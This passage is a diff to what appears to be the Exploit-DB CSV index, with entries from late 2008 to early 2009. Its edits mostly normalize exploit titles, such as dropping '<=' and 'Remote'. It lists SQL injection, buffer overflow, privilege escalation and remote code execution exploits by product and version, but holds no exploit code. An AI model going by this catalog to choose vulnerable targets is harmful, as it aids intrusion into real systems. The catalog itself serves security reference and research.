Upload",2008-12-21,S.W.A.T.,php,webapps,0 -7532,platforms/php/webapps/7532.txt,"chicomas <= 2.0.4 - (DB Backup/DD/XSS) Multiple Vulnerabilities",2008-12-21,BugReport.IR,php,webapps,0 -7533,platforms/windows/local/7533.txt,"PowerStrip <= 3.84 - (pstrip.sys) Privilege Escalation Exploit",2008-12-21,"NT Internals",windows,local,0 +7532,platforms/php/webapps/7532.txt,"chicomas 2.0.4 - (DB Backup/DD/XSS) Multiple Vulnerabilities",2008-12-21,BugReport.IR,php,webapps,0 +7533,platforms/windows/local/7533.txt,"PowerStrip 3.84 - (pstrip.sys) Privilege Escalation Exploit",2008-12-21,"NT Internals",windows,local,0 7534,platforms/asp/webapps/7534.txt,"Emefa Guestbook 3.0 - Remote Database Disclosure",2008-12-21,Cyber.Zer0,asp,webapps,0 7535,platforms/hardware/dos/7535.php,"Linksys Wireless ADSL Router (WAG54G v2) - httpd DoS Exploit",2008-12-21,r0ut3r,hardware,dos,0 7536,platforms/windows/local/7536.cpp,"CoolPlayer 2.19 - (.Skin) Local Buffer Overflow Exploit",2008-12-21,r0ut3r,windows,local,0 @@ -7081,26 +7081,26 @@ id,file,description,date,author,platform,type,port 7538,platforms/php/webapps/7538.txt,"Joomla Component com_hbssearch 1.0 - Blind SQL Injection",2008-12-21,boom3rang,php,webapps,0 7539,platforms/php/webapps/7539.txt,"Joomla Component com_tophotelmodule 1.0 - Blind SQL Injection",2008-12-21,boom3rang,php,webapps,0 7540,platforms/php/webapps/7540.txt,"phpg 1.6 - (XSS/Path Disclosure/DoS) Multiple Vulnerabilities",2008-12-21,"Anarchy Angel",php,webapps,0 -7541,platforms/php/webapps/7541.pl,"RSS Simple News (news.php pid) Remote SQL Injection Exploit",2008-12-22,Piker,php,webapps,0 +7541,platforms/php/webapps/7541.pl,"RSS Simple News (news.php pid) SQL Injection Exploit",2008-12-22,Piker,php,webapps,0 7542,platforms/php/webapps/7542.txt,"Text Lines Rearrange Script - (filename) File Disclosure",2008-12-22,SirGod,php,webapps,0 -7543,platforms/php/webapps/7543.txt,"WordPress Plugin Page Flip Image Gallery <= 0.2.2 - Remote FD",2008-12-22,GoLd_M,php,webapps,0 +7543,platforms/php/webapps/7543.txt,"WordPress Plugin Page Flip Image Gallery 0.2.2 - Remote FD",2008-12-22,GoLd_M,php,webapps,0 7544,platforms/php/webapps/7544.txt,"Pligg 9.9.5b (check_url.php url) Upload Shell/SQL Injection Exploit",2008-12-22,Ams,php,webapps,0 -7545,platforms/php/webapps/7545.txt,"yourplace <= 1.0.2 - Multiple Vulnerabilities + RCE Exploit",2008-12-22,Osirys,php,webapps,0 +7545,platforms/php/webapps/7545.txt,"yourplace 1.0.2 - Multiple Vulnerabilities + RCE Exploit",2008-12-22,Osirys,php,webapps,0 7546,platforms/php/webapps/7546.txt,"Joomla Component Volunteer 2.0 - (job_id) SQL Injection",2008-12-22,boom3rang,php,webapps,0 7547,platforms/windows/local/7547.py,"CoolPlayer 2.19 - (.Skin) Local Buffer Overflow Exploit (Python)",2008-12-22,"Encrypt3d.M!nd ",windows,local,0 7548,platforms/php/webapps/7548.php,"SolarCMS 0.53.8 - (Forum) Remote Cookies Disclosure Exploit",2008-12-22,StAkeR,php,webapps,0 -7549,platforms/php/webapps/7549.txt,"RoundCube Webmail <= 0.2-3 beta Code Execution",2008-12-22,"Jacobo Gimeno",php,webapps,0 +7549,platforms/php/webapps/7549.txt,"RoundCube Webmail 0.2-3 beta Code Execution",2008-12-22,"Jacobo Gimeno",php,webapps,0 7550,platforms/multiple/local/7550.c,"CUPS < 1.3.8-4 - (pstopdf filter) Privilege Escalation Exploit",2008-12-22,"Jon Oberheide",multiple,local,0 7551,platforms/php/webapps/7551.txt,"Calendar Script 1.1 - (Auth Bypass) SQL Injection",2008-12-22,StAkeR,php,webapps,0 -7552,platforms/php/webapps/7552.txt,"REDPEACH CMS (zv) Remote SQL Injection",2008-12-22,Lidloses_Auge,php,webapps,0 -7553,platforms/php/webapps/7553.sh,"RoundCube Webmail <= 0.2b Remote Code Execution Exploit",2008-12-22,Hunger,php,webapps,0 +7552,platforms/php/webapps/7552.txt,"REDPEACH CMS (zv) SQL Injection",2008-12-22,Lidloses_Auge,php,webapps,0 +7553,platforms/php/webapps/7553.sh,"RoundCube Webmail 0.2b Remote Code Execution Exploit",2008-12-22,Hunger,php,webapps,0 7554,platforms/windows/dos/7554.pl,"Mozilla Firefox 3.0.5 location.hash Remote Crash Exploit",2008-12-23,"Jeremy Brown",windows,dos,0 7555,platforms/multiple/dos/7555.py,"Psi Jabber Client (8010/tcp) Remote Denial of Service Exploit (win/lin)",2008-12-23,Sha0,multiple,dos,0 7556,platforms/windows/dos/7556.php,"PGP Desktop 9.0.6 - (PGPwded.sys) Local Denial of Service Exploit",2008-12-23,Evilcry,windows,dos,0 -7557,platforms/php/webapps/7557.txt,"PHPmotion <= 2.1 - CSRF",2008-12-23,Ausome1,php,webapps,0 +7557,platforms/php/webapps/7557.txt,"PHPmotion 2.1 - CSRF",2008-12-23,Ausome1,php,webapps,0 7558,platforms/php/webapps/7558.txt,"phpLD 3.3 - (page.php name) Blind SQL Injection",2008-12-23,fuzion,php,webapps,0 7559,platforms/php/webapps/7559.php,"CMS NetCat 3.12 - (password_recovery.php) Blind SQL Injection Exploit",2008-12-23,s4avrd0w,php,webapps,0 -7560,platforms/php/webapps/7560.txt,"cms netcat <= 3.12 - Multiple Vulnerabilities",2008-12-23,s4avrd0w,php,webapps,0 +7560,platforms/php/webapps/7560.txt,"cms netcat 3.12 - Multiple Vulnerabilities",2008-12-23,s4avrd0w,php,webapps,0 7561,platforms/php/webapps/7561.txt,"phpGreetCards XSS/Arbitrary File Upload",2008-12-23,ahmadbady,php,webapps,0 7562,platforms/php/webapps/7562.txt,"phpAdBoard (php uploads) Arbitrary File Upload",2008-12-23,ahmadbady,php,webapps,0 7563,platforms/php/webapps/7563.txt,"phpEmployment (php upload) Arbitrary File Upload",2008-12-23,ahmadbady,php,webapps,0 @@ -7109,42 +7109,42 @@ id,file,description,date,author,platform,type,port 7566,platforms/windows/remote/7566.html,"Google Chrome Browser (ChromeHTML://) Remote Parameter Injection",2008-12-23,Nine:Situations:Group,windows,remote,0 7567,platforms/php/webapps/7567.txt,"Joomla Component com_lowcosthotels - (id) Blind SQL Injection",2008-12-23,"Hussin X",php,webapps,0 7568,platforms/php/webapps/7568.txt,"Joomla Component com_allhotels (id) Blind SQL Injection",2008-12-23,"Hussin X",php,webapps,0 -7569,platforms/php/webapps/7569.txt,"doop CMS <= 1.4.0b - (CSRF/upload shell) Multiple Vulnerabilities",2008-12-24,x0r,php,webapps,0 -7570,platforms/php/webapps/7570.txt,"ILIAS <= 3.7.4 - (ref_id) Blind SQL Injection",2008-12-24,Lidloses_Auge,php,webapps,0 +7569,platforms/php/webapps/7569.txt,"doop CMS 1.4.0b - (CSRF/upload shell) Multiple Vulnerabilities",2008-12-24,x0r,php,webapps,0 +7570,platforms/php/webapps/7570.txt,"ILIAS 3.7.4 - (ref_id) Blind SQL Injection",2008-12-24,Lidloses_Auge,php,webapps,0 7571,platforms/windows/dos/7571.txt,"BulletProof FTP Client 2.63 - Local Heap Overflow PoC",2008-12-24,His0k4,windows,dos,0 7572,platforms/php/webapps/7572.txt,"Joomla Component Ice Gallery 0.5b2 - (catid) Blind SQL Injection",2008-12-24,boom3rang,php,webapps,0 7573,platforms/php/webapps/7573.txt,"Joomla Component Live Ticker 1.0 - (tid) Blind SQL Injection",2008-12-24,boom3rang,php,webapps,0 7574,platforms/php/webapps/7574.txt,"Joomla Component mdigg 2.2.8 - (category) SQL Injection",2008-12-24,boom3rang,php,webapps,0 7575,platforms/php/webapps/7575.pl,"Joomla Component 5starhotels (id) SQL Injection Exploit",2008-12-24,EcHoLL,php,webapps,0 -7576,platforms/php/webapps/7576.pl,"PHP-Fusion <= 7.0.2 - Remote Blind SQL Injection Exploit",2008-12-24,StAkeR,php,webapps,0 -7577,platforms/windows/local/7577.pl,"Acoustica Mixcraft <= 4.2 - Universal Stack Overflow Exploit (SEH)",2008-12-24,SkD,windows,local,0 +7576,platforms/php/webapps/7576.pl,"PHP-Fusion 7.0.2 - Remote Blind SQL Injection Exploit",2008-12-24,StAkeR,php,webapps,0 +7577,platforms/windows/local/7577.pl,"Acoustica Mixcraft 4.2 - Universal Stack Overflow Exploit (SEH)",2008-12-24,SkD,windows,local,0 7578,platforms/windows/dos/7578.pl,"SAWStudio 3.9i - (.prf) Local Buffer Overflow PoC",2008-12-24,"Encrypt3d.M!nd ",windows,dos,0 -7579,platforms/php/webapps/7579.txt,"ClaSS <= 0.8.60 - (export.php ftype) Local File Inclusion",2008-12-24,fuzion,php,webapps,0 +7579,platforms/php/webapps/7579.txt,"ClaSS 0.8.60 - (export.php ftype) Local File Inclusion",2008-12-24,fuzion,php,webapps,0 7580,platforms/php/webapps/7580.txt,"BloofoxCMS 0.3.4 - (lang) Local File Inclusion",2008-12-24,fuzion,php,webapps,0 7581,platforms/freebsd/local/7581.c,"FreeBSD 6x/7 - protosw kernel Local Privledge Escalation Exploit",2008-12-28,"Don Bailey",freebsd,local,0 7582,platforms/windows/local/7582.py,"IntelliTamper 2.07/2.08 - (.MAP) Local SEH Overwrite Exploit",2008-12-28,Cnaph,windows,local,0 7583,platforms/windows/remote/7583.pl,"Microsoft Internet Explorer XML Parsing Buffer Overflow Exploit",2008-12-28,"Jeremy Brown",windows,remote,0 -7584,platforms/windows/remote/7584.pl,"Amaya Web Browser <= 11.0.1 - Remote Buffer Overflow Exploit (vista)",2008-12-28,SkD,windows,remote,0 +7584,platforms/windows/remote/7584.pl,"Amaya Web Browser 11.0.1 - Remote Buffer Overflow Exploit (vista)",2008-12-28,SkD,windows,remote,0 7585,platforms/windows/dos/7585.txt,"Microsoft Windows Media Player - (.WAV) Remote Crash PoC",2008-12-28,"laurent gaffié ",windows,dos,0 7586,platforms/php/webapps/7586.txt,"Miniweb 2.0 - (Auth Bypass) SQL Injection",2008-12-28,bizzit,php,webapps,0 7587,platforms/php/webapps/7587.txt,"Joomla Component PAX Gallery 0.1 - Blind SQL Injection",2008-12-28,XaDoS,php,webapps,0 7589,platforms/windows/dos/7589.pl,"BulletProof FTP Client - (.bps) Local Stack Overflow PoC",2008-12-28,Stack,windows,dos,0 7592,platforms/windows/dos/7592.pl,"Hex Workshop 5.1.4 - Color Mapping File Local Buffer Overflow PoC",2008-12-28,"Encrypt3d.M!nd ",windows,dos,0 -7593,platforms/php/webapps/7593.pl,"DeluxeBB <= 1.2 - Remote Blind SQL Injection Exploit",2008-12-28,StAkeR,php,webapps,0 +7593,platforms/php/webapps/7593.pl,"DeluxeBB 1.2 - Remote Blind SQL Injection Exploit",2008-12-28,StAkeR,php,webapps,0 7594,platforms/windows/remote/7594.html,"Chilkat FTP ActiveX (SaveLastError) Insecure Method Exploit",2008-12-28,callAX,windows,remote,0 7595,platforms/php/webapps/7595.txt,"FubarForum 1.6 - Arbitrary Admin Bypass",2008-12-28,k3yv4n,php,webapps,0 7596,platforms/php/webapps/7596.txt,"AlstraSoft Web Email Script Enterprise - (id) SQL Injection",2008-12-28,Bgh7,php,webapps,0 7597,platforms/php/webapps/7597.txt,"OwenPoll 1.0 Insecure Cookie Handling",2008-12-28,Osirys,php,webapps,0 -7598,platforms/php/webapps/7598.txt,"PHP-Fusion Mod TI (id) Remote SQL Injection",2008-12-28,"Khashayar Fereidani",php,webapps,0 +7598,platforms/php/webapps/7598.txt,"PHP-Fusion Mod TI (id) SQL Injection",2008-12-28,"Khashayar Fereidani",php,webapps,0 7599,platforms/asp/webapps/7599.txt,"ForumApp 3.3 - Remote Database Disclosure",2008-12-28,Cyber.Zer0,asp,webapps,0 7600,platforms/php/webapps/7600.pl,"Flexphplink Pro Arbitrary File Upload Exploit",2008-12-28,Osirys,php,webapps,0 7601,platforms/php/webapps/7601.txt,"Silentum LoginSys 1.0.0 Insecure Cookie Handling",2008-12-28,Osirys,php,webapps,0 7602,platforms/php/webapps/7602.txt,"webClassifieds 2005 - (Auth Bypass) SQL Injection",2008-12-29,AnGeL25dZ,php,webapps,0 7603,platforms/php/webapps/7603.txt,"eDNews 2.0 - (lg) Local File Inclusion",2008-12-29,GoLd_M,php,webapps,0 7604,platforms/php/webapps/7604.txt,"eDContainer 2.22 - (lg) Local File Inclusion",2008-12-29,GoLd_M,php,webapps,0 -7605,platforms/php/webapps/7605.php,"TaskDriver <= 1.3 - Remote Change Admin Password Exploit",2008-12-29,cOndemned,php,webapps,0 +7605,platforms/php/webapps/7605.php,"TaskDriver 1.3 - Remote Change Admin Password Exploit",2008-12-29,cOndemned,php,webapps,0 7606,platforms/php/webapps/7606.txt,"FubarForum 1.6 Admin Bypass Change User Password",2008-12-29,R31P0l,php,webapps,0 -7607,platforms/php/webapps/7607.pl,"Ultimate PHP Board <= 2.2.1 - (log inj) Privilege Escalation Exploit",2008-12-29,StAkeR,php,webapps,0 +7607,platforms/php/webapps/7607.pl,"Ultimate PHP Board 2.2.1 - (log inj) Privilege Escalation Exploit",2008-12-29,StAkeR,php,webapps,0 7608,platforms/windows/local/7608.py,"IntelliTamper 2.07/2.08 - (ProxyLogin) Local Stack Overflow Exploit",2008-12-29,His0k4,windows,local,0 7609,platforms/asp/webapps/7609.txt,"Sepcity Shopping Mall (shpdetails.asp ID) SQL Injection",2008-12-29,Osmanizim,asp,webapps,0 7610,platforms/asp/webapps/7610.txt,"Sepcity Lawyer Portal (deptdisplay.asp ID) SQL Injection",2008-12-29,Osmanizim,asp,webapps,0 @@ -7164,27 +7164,27 @@ id,file,description,date,author,platform,type,port 7624,platforms/php/webapps/7624.txt,"Flexphpic 0.0.x - (Auth Bypass) SQL Injection",2008-12-30,S.W.A.T.,php,webapps,0 7625,platforms/php/webapps/7625.txt,"CMScout 2.06 SQL Injection/Local File Inclusion Vulnerabilities",2008-12-30,SirGod,php,webapps,0 7626,platforms/php/webapps/7626.txt,"Mole Group Vacation Estate Listing Script (editid1) Blind SQL Injection",2008-12-30,x0r,php,webapps,0 -7627,platforms/asp/webapps/7627.txt,"Pixel8 Web Photo Album 3.0 - Remote SQL Injection",2008-12-30,AlpHaNiX,asp,webapps,0 +7627,platforms/asp/webapps/7627.txt,"Pixel8 Web Photo Album 3.0 - SQL Injection",2008-12-30,AlpHaNiX,asp,webapps,0 7628,platforms/php/webapps/7628.txt,"viart shopping cart 3.5 - Multiple Vulnerabilities",2009-01-01,"Xia Shing Zee",php,webapps,0 7629,platforms/php/webapps/7629.txt,"DDL-Speed Script (acp/backup) Admin Backup Bypass",2009-01-01,tmh,php,webapps,0 7630,platforms/windows/remote/7630.html,"Megacubo 5.0.7 - (mega://) Remote File Download and Execute Exploit",2009-01-01,JJunior,windows,remote,0 -7631,platforms/php/webapps/7631.txt,"2Capsule - (sticker.php id) Remote SQL Injection",2009-01-01,Zenith,php,webapps,0 +7631,platforms/php/webapps/7631.txt,"2Capsule - (sticker.php id) SQL Injection",2009-01-01,Zenith,php,webapps,0 7632,platforms/hardware/dos/7632.txt,"Nokia S60 SMS/MMS (Curse of Silence) - Denial of Service",2009-01-01,"Tobias Engel",hardware,dos,0 7633,platforms/php/webapps/7633.txt,"EggBlog 3.1.10 Change Admin Pass CSRF",2009-01-01,x0r,php,webapps,0 7634,platforms/windows/dos/7634.pl,"Audacity 1.2.6 - (.gro) Local Buffer Overflow PoC",2009-01-01,Houssamix,windows,dos,0 7635,platforms/php/webapps/7635.txt,"ASPThai.Net Webboard 6.0 - (bview.asp) SQL Injection",2009-01-01,DaiMon,php,webapps,0 -7636,platforms/php/webapps/7636.pl,"PHPFootball <= 1.6 - (filter.php) Remote Hash Disclosure Exploit",2009-01-01,KinG-LioN,php,webapps,0 +7636,platforms/php/webapps/7636.pl,"PHPFootball 1.6 - (filter.php) Remote Hash Disclosure Exploit",2009-01-01,KinG-LioN,php,webapps,0 7637,platforms/windows/dos/7637.pl,"Elecard MPEG Player 5.5 - (.m3u) Stack Buffer Overflow PoC",2009-01-01,"aBo MoHaMeD",windows,dos,0 7638,platforms/php/webapps/7638.txt,"Memberkit 1.0 - Remote PHP File Upload",2009-01-01,Lo$er,php,webapps,0 7639,platforms/php/webapps/7639.txt,"phpScribe 0.9 - (user.cfg) Remote Config Disclosure",2009-01-01,ahmadbady,php,webapps,0 -7640,platforms/php/webapps/7640.txt,"w3blabor CMS <= 3.3.0 - (Admin Bypass) SQL Injection",2009-01-01,DNX,php,webapps,0 +7640,platforms/php/webapps/7640.txt,"w3blabor CMS 3.3.0 - (Admin Bypass) SQL Injection",2009-01-01,DNX,php,webapps,0 7641,platforms/php/webapps/7641.txt,"PowerNews 2.5.4 - (news.php newsid) SQL Injection",2009-01-01,"Virangar Security",php,webapps,0 7642,platforms/php/webapps/7642.txt,"PowerClan 1.14a (Auth Bypass) SQL Injection",2009-01-01,"Virangar Security",php,webapps,0 7643,platforms/multiple/dos/7643.txt,"Konqueror 4.1 - XSS / Remote Crash Vulnerabilities",2009-01-01,StAkeR,multiple,dos,0 7644,platforms/php/webapps/7644.txt,"Built2Go PHP Link Portal 1.95.1 - Remote File Upload",2009-01-02,ZoRLu,php,webapps,0 7645,platforms/php/webapps/7645.txt,"Built2Go PHP Rate My Photo 1.46.4 - Remote File Upload",2009-01-02,ZoRLu,php,webapps,0 -7646,platforms/multiple/local/7646.txt,"PHP <= 5.2.8 gd library - imageRotate() Information Leak",2009-01-02,"Hamid Ebadi",multiple,local,0 -7647,platforms/multiple/dos/7647.txt,"VMware <= 2.5.1 - (Vmware-authd) Remote Denial of Service Exploit",2009-01-02,"laurent gaffié ",multiple,dos,0 +7646,platforms/multiple/local/7646.txt,"PHP 5.2.8 gd library - imageRotate() Information Leak",2009-01-02,"Hamid Ebadi",multiple,local,0 +7647,platforms/multiple/dos/7647.txt,"VMware 2.5.1 - (Vmware-authd) Remote Denial of Service Exploit",2009-01-02,"laurent gaffié ",multiple,dos,0 7648,platforms/php/webapps/7648.txt,"phpskelsite 1.4 - (RFI/LFI/XSS) Multiple Vulnerabilities",2009-01-02,ahmadbady,php,webapps,0 7649,platforms/windows/dos/7649.pl,"Destiny Media Player 1.61 - (.m3u) Local Buffer Overflow PoC",2009-01-02,"aBo MoHaMeD",windows,dos,0 7650,platforms/php/webapps/7650.php,"Lito Lite CMS - Multiple Cross-Site Scripting / Blind SQL Injection Exploit",2009-01-03,darkjoker,php,webapps,0 @@ -7194,20 +7194,20 @@ id,file,description,date,author,platform,type,port 7654,platforms/windows/local/7654.pl,"Destiny Media Player 1.61 - (.lst) Local Buffer Overflow Exploit",2009-01-04,"Encrypt3d.M!nd ",windows,local,0 7655,platforms/windows/local/7655.pl,"Destiny Media Player 1.61 - (.lst) Local Buffer Overflow Exploit (2)",2009-01-04,sCORPINo,windows,local,0 7656,platforms/windows/local/7656.pl,"Destiny Media Player 1.61 - (.lst) Local Buffer Overflow Exploit (3)",2009-01-04,Houssamix,windows,local,0 -7657,platforms/php/webapps/7657.txt,"webSPELL <= 4.01.02 - (id) Remote Edit Topics",2009-01-04,StAkeR,php,webapps,0 +7657,platforms/php/webapps/7657.txt,"webSPELL 4.01.02 - (id) Remote Edit Topics",2009-01-04,StAkeR,php,webapps,0 7658,platforms/php/webapps/7658.pl,"PNphpBB2 <= 12i - (ModName) Multiple Local File Inclusion Exploit",2009-01-04,StAkeR,php,webapps,0 -7659,platforms/php/webapps/7659.txt,"WSN Guest 1.23 - (search) Remote SQL Injection",2009-01-04,DaiMon,php,webapps,0 -7660,platforms/php/webapps/7660.txt,"PhpMesFilms 1.0 - (index.php id) Remote SQL Injection",2009-01-04,SuB-ZeRo,php,webapps,0 +7659,platforms/php/webapps/7659.txt,"WSN Guest 1.23 - (search) SQL Injection",2009-01-04,DaiMon,php,webapps,0 +7660,platforms/php/webapps/7660.txt,"PhpMesFilms 1.0 - (index.php id) SQL Injection",2009-01-04,SuB-ZeRo,php,webapps,0 7661,platforms/windows/local/7661.pl,"Destiny Media Player 1.61 - (.lst) Local Buffer Overflow Exploit (4)",2009-01-04,Stack,windows,local,0 7662,platforms/windows/local/7662.py,"Destiny Media Player 1.61 - (.lst) Local Buffer Overflow Exploit (5)",2009-01-04,suN8Hclf,windows,local,0 -7663,platforms/php/webapps/7663.txt,"plxAutoReminder 3.7 - (id) Remote SQL Injection",2009-01-04,ZoRLu,php,webapps,0 +7663,platforms/php/webapps/7663.txt,"plxAutoReminder 3.7 - (id) SQL Injection",2009-01-04,ZoRLu,php,webapps,0 7664,platforms/php/webapps/7664.pl,"The Rat CMS Alpha 2 - (viewarticle.php id) Blind SQL Injection Exploit",2009-01-04,darkjoker,php,webapps,0 7665,platforms/asp/webapps/7665.txt,"Ayemsis Emlak Pro - (acc.mdb) Database Disclosure",2009-01-05,ByALBAYX,asp,webapps,0 7666,platforms/asp/webapps/7666.txt,"Ayemsis Emlak Pro - (Auth Bypass) SQL Injection",2009-01-05,ByALBAYX,asp,webapps,0 7667,platforms/php/webapps/7667.txt,"Joomla Component simple_review 1.x SQL Injection",2009-01-05,EcHoLL,php,webapps,0 7668,platforms/php/webapps/7668.pl,"Cybershade CMS 0.2b (index.php) Remote File Inclusion Exploit",2009-01-05,JosS,php,webapps,0 7669,platforms/php/webapps/7669.pl,"Joomla com_na_newsdescription (newsid) SQL Injection Exploit",2009-01-05,EcHoLL,php,webapps,0 -7670,platforms/php/webapps/7670.pl,"Joomla com_phocadocumentation (id) Remote SQL Injection Exploit",2009-01-05,EcHoLL,php,webapps,0 +7670,platforms/php/webapps/7670.pl,"Joomla com_phocadocumentation (id) SQL Injection Exploit",2009-01-05,EcHoLL,php,webapps,0 7671,platforms/windows/local/7671.pl,"VUPlayer 2.49 - (.wax) Local Buffer Overflow Exploit",2009-01-05,Houssamix,windows,local,0 7672,platforms/php/webapps/7672.txt,"phpauctionsystem - (XSS/SQL) Multiple Vulnerabilities",2009-01-05,x0r,php,webapps,0 7673,platforms/multiple/dos/7673.html,"Safari (Arguments) Array Integer Overflow PoC (New Heap Spray)",2009-01-05,Skylined,multiple,dos,0 @@ -7216,19 +7216,19 @@ id,file,description,date,author,platform,type,port 7676,platforms/multiple/local/7676.txt,"Oracle 10g SYS.LT.MERGEWORKSPACE SQL Injection Exploit",2009-01-06,sh2kerr,multiple,local,0 7677,platforms/multiple/local/7677.txt,"Oracle 10g - SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit (1)",2009-01-06,sh2kerr,multiple,local,0 7678,platforms/php/webapps/7678.txt,"PHPAuctionSystem Multiple Remote File Inclusion Vulnerabilities",2009-01-06,darkmasking,php,webapps,0 -7679,platforms/php/webapps/7679.php,"RiotPix <= 0.61 - (forumid) Blind SQL Injection Exploit",2009-01-06,cOndemned,php,webapps,0 +7679,platforms/php/webapps/7679.php,"RiotPix 0.61 - (forumid) Blind SQL Injection Exploit",2009-01-06,cOndemned,php,webapps,0 7680,platforms/php/webapps/7680.txt,"ezpack 4.2b2 - (XSS/SQL) Multiple Vulnerabilities",2009-01-06,!-BUGJACK-!,php,webapps,0 7681,platforms/linux/local/7681.txt,"Debian GNU/Linux XTERM (DECRQSS/comments) Weakness",2009-01-06,"Paul Szabo",linux,local,0 -7682,platforms/php/webapps/7682.txt,"RiotPix <= 0.61 - (Auth Bypass) SQL Injection",2009-01-06,ZoRLu,php,webapps,0 -7683,platforms/php/webapps/7683.pl,"Goople <= 1.8.2 - (frontpage.php) Blind SQL Injection Exploit",2009-01-06,darkjoker,php,webapps,0 +7682,platforms/php/webapps/7682.txt,"RiotPix 0.61 - (Auth Bypass) SQL Injection",2009-01-06,ZoRLu,php,webapps,0 +7683,platforms/php/webapps/7683.pl,"Goople 1.8.2 - (frontpage.php) Blind SQL Injection Exploit",2009-01-06,darkjoker,php,webapps,0 7684,platforms/windows/local/7684.pl,"Rosoft Media Player 4.2.1 - Local Buffer Overflow Exploit",2009-01-06,"Encrypt3d.M!nd ",windows,local,0 -7685,platforms/multiple/dos/7685.pl,"SeaMonkey <= 1.1.14 - (marquee) Denial of Service Exploit",2009-01-06,StAkeR,multiple,dos,0 -7686,platforms/php/webapps/7686.txt,"ItCMS <= 2.1a (Auth Bypass) SQL Injection",2009-01-06,certaindeath,php,webapps,0 +7685,platforms/multiple/dos/7685.pl,"SeaMonkey 1.1.14 - (marquee) Denial of Service Exploit",2009-01-06,StAkeR,multiple,dos,0 +7686,platforms/php/webapps/7686.txt,"ItCMS 2.1a (Auth Bypass) SQL Injection",2009-01-06,certaindeath,php,webapps,0 7687,platforms/php/webapps/7687.txt,"playSms 0.9.3 - Multiple Remote/Local File Inclusion Vulnerabilities",2009-01-06,ahmadbady,php,webapps,0 7688,platforms/windows/local/7688.pl,"Cain & Abel 4.9.25 - (Cisco IOS-MD5) Local Buffer Overflow Exploit",2009-01-07,send9,windows,local,0 7689,platforms/php/webapps/7689.txt,"BlogHelper (common_db.inc) Remote Config File Disclosure",2009-01-06,ahmadbady,php,webapps,0 7690,platforms/php/webapps/7690.txt,"PollHelper (poll.inc) Remote Config File Disclosure",2009-01-06,ahmadbady,php,webapps,0 -7691,platforms/php/webapps/7691.php,"Joomla <= 1.5.8 - (xstandard editor) Local Directory Traversal",2009-01-07,irk4z,php,webapps,0 +7691,platforms/php/webapps/7691.php,"Joomla 1.5.8 - (xstandard editor) Local Directory Traversal",2009-01-07,irk4z,php,webapps,0 7692,platforms/windows/local/7692.pl,"CoolPlayer 2.19 - (PlaylistSkin) Buffer Overflow Exploit",2009-01-07,"Jeremy Brown",windows,local,0 7693,platforms/windows/dos/7693.pl,"Perception LiteServe 2.0.1 - (user) Remote Buffer Overflow PoC",2009-01-07,Houssamix,windows,dos,0 7694,platforms/windows/dos/7694.py,"Audacity 1.6.2 - (.aup) Remote off by one Crash Exploit",2009-01-07,Stack,windows,dos,0 @@ -7237,13 +7237,13 @@ id,file,description,date,author,platform,type,port 7697,platforms/php/webapps/7697.txt,"PHP-Fusion Mod Members CV (job) 1.0 - SQL Injection",2009-01-07,"Khashayar Fereidani",php,webapps,0 7698,platforms/php/webapps/7698.txt,"PHP-Fusion Mod E-Cart 1.3 - (items.php CA) SQL Injection",2009-01-07,"Khashayar Fereidani",php,webapps,0 7699,platforms/php/webapps/7699.txt,"QuoteBook (poll.inc) Remote Config File Disclosure",2009-01-07,Moudi,php,webapps,0 -7700,platforms/php/webapps/7700.php,"CuteNews <= 1.4.6 - (ip ban) XSS/Command Execution Exploit (adm req.)",2009-01-08,StAkeR,php,webapps,0 +7700,platforms/php/webapps/7700.php,"CuteNews 1.4.6 - (ip ban) XSS/Command Execution Exploit (adm req.)",2009-01-08,StAkeR,php,webapps,0 7701,platforms/linux/remote/7701.txt,"Samba < 3.0.20 - Remote Heap Overflow Exploit",2009-01-08,zuc,linux,remote,445 7702,platforms/windows/local/7702.c,"GOM Player 2.0.12.3375 - (.ASX) Stack Overflow Exploit",2009-01-08,DATA_SNIPER,windows,local,0 7703,platforms/php/webapps/7703.txt,"PHP-Fusion Mod vArcade 1.8 - (comment_id) SQL Injection",2009-01-08,"Khashayar Fereidani",php,webapps,0 -7704,platforms/php/webapps/7704.pl,"Pizzis CMS <= 1.5.1 - (visualizza.php idvar) Blind SQL Injection Exploit",2009-01-08,darkjoker,php,webapps,0 +7704,platforms/php/webapps/7704.pl,"Pizzis CMS 1.5.1 - (visualizza.php idvar) Blind SQL Injection Exploit",2009-01-08,darkjoker,php,webapps,0 7705,platforms/php/webapps/7705.pl,"XOOPS 2.3.2 - (mydirname) Remote PHP Code Execution Exploit",2009-01-08,StAkeR,php,webapps,0 -7706,platforms/windows/remote/7706.mrc,"Anope IRC Services With bs_fantasy_ext <= 1.2.0-RC1 mIRC script",2009-01-08,Phil,windows,remote,0 +7706,platforms/windows/remote/7706.mrc,"Anope IRC Services With bs_fantasy_ext 1.2.0-RC1 mIRC script",2009-01-08,Phil,windows,remote,0 7707,platforms/windows/local/7707.py,"IntelliTamper (2.07/2.08) - Language Catalog SEH Overflow Exploit",2009-01-08,Cnaph,windows,local,0 7708,platforms/windows/dos/7708.pl,"MP3 TrackMaker 1.5 - (.mp3) Local Heap Overflow PoC",2009-01-09,Houssamix,windows,dos,0 7709,platforms/windows/dos/7709.pl,"VUPlayer 2.49 - (.asx) (HREF) Local Buffer Overflow PoC",2009-01-09,"aBo MoHaMeD",windows,dos,0 @@ -7253,33 +7253,33 @@ id,file,description,date,author,platform,type,port 7713,platforms/windows/local/7713.pl,"VUPlayer 2.49 - (.asx) (HREF) Local Buffer Overflow Exploit (2)",2009-01-09,Houssamix,windows,local,0 7714,platforms/windows/local/7714.pl,"VUPlayer 2.49 - (.asx) (HREF) Local Buffer Overflow Exploit (1)",2009-01-11,sCORPINo,windows,local,0 7715,platforms/windows/local/7715.py,"VUPlayer 2.49 - (.asx) (HREF) Universal Buffer Overflow Exploit",2009-01-11,His0k4,windows,local,0 -7716,platforms/php/webapps/7716.pl,"Joomla com_xevidmegahd (catid) Remote SQL Injection Exploit",2009-01-11,EcHoLL,php,webapps,0 -7717,platforms/php/webapps/7717.pl,"Joomla com_jashowcase (catid) Remote SQL Injection Exploit",2009-01-11,EcHoLL,php,webapps,0 -7718,platforms/php/webapps/7718.txt,"Joomla com_newsflash (id) Remote SQL Injection",2009-01-11,EcHoLL,php,webapps,0 +7716,platforms/php/webapps/7716.pl,"Joomla com_xevidmegahd (catid) SQL Injection Exploit",2009-01-11,EcHoLL,php,webapps,0 +7717,platforms/php/webapps/7717.pl,"Joomla com_jashowcase (catid) SQL Injection Exploit",2009-01-11,EcHoLL,php,webapps,0 +7718,platforms/php/webapps/7718.txt,"Joomla com_newsflash (id) SQL 